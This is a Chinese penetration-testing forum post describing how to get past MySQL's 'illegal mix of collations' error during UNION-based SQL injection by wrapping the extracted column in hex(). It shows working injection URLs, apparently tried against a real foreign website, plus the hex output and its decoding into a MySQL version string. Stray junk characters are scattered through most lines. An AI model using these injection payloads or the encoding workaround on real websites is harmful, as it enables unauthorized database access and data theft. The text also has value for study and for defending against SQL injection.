找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MySQL注射时ErrorNo.1267的突破
返回列表 发新帖
查看: 2792|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei+ h; E% _, R0 L, s8 C
文章性质:原创& e% ^' _) B! a9 A' ^) e5 P8 c0 j
发布日期:2005-10-18  B6 q7 R! y( D2 D1 {' ^, ]" }
测试个国外的站时:
/ [- i8 q" l3 O- t( ]# \+ O- l: vurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
% N& C( z% {  t6 z4 Y返回错误:/ X* @7 ~- V  P; _- `" ^# B/ x
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
# ]+ m7 E4 g. S, {6 xMySQL Error No. 1266 z/ i, N; R: J7 m2 ~" n& S" h7 k) J
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。( V6 ]+ y/ t4 d
解决办法:转为其他编码如hex。
/ p/ c& X# S& C( w( {5 rurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/** |5 t) i! N1 l3 E# g4 a' z; [$ q7 k
成功得到hex(version())的值为:
6 h+ X  f$ g" l: \1 p; X342E312E332D62657461# S" M  [2 o3 U/ Q( _/ t/ S: u
回Mysql查询下得到:* D- p3 [" ?5 O5 m5 [
mysql> select 0x342E312E332D62657461;
+ ?' b1 m# D5 L+ L  q( s+------------------------+
) V0 C# a* u2 `| 0x342E312E332D62657461 |
2 _9 B  N4 Z+ A! m# ^; x( i+------------------------+
# _/ K+ L5 J+ P  i3 L| 4.1.3-beta |
9 N, G/ P' _6 B' x8 I  q3 T+------------------------+- @: v2 W. R% l5 l, j, p) L, f" ^
1 row in set (0.00 sec)/ t2 b; M# G9 v

/ S6 ]/ Y' l8 L" ^
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表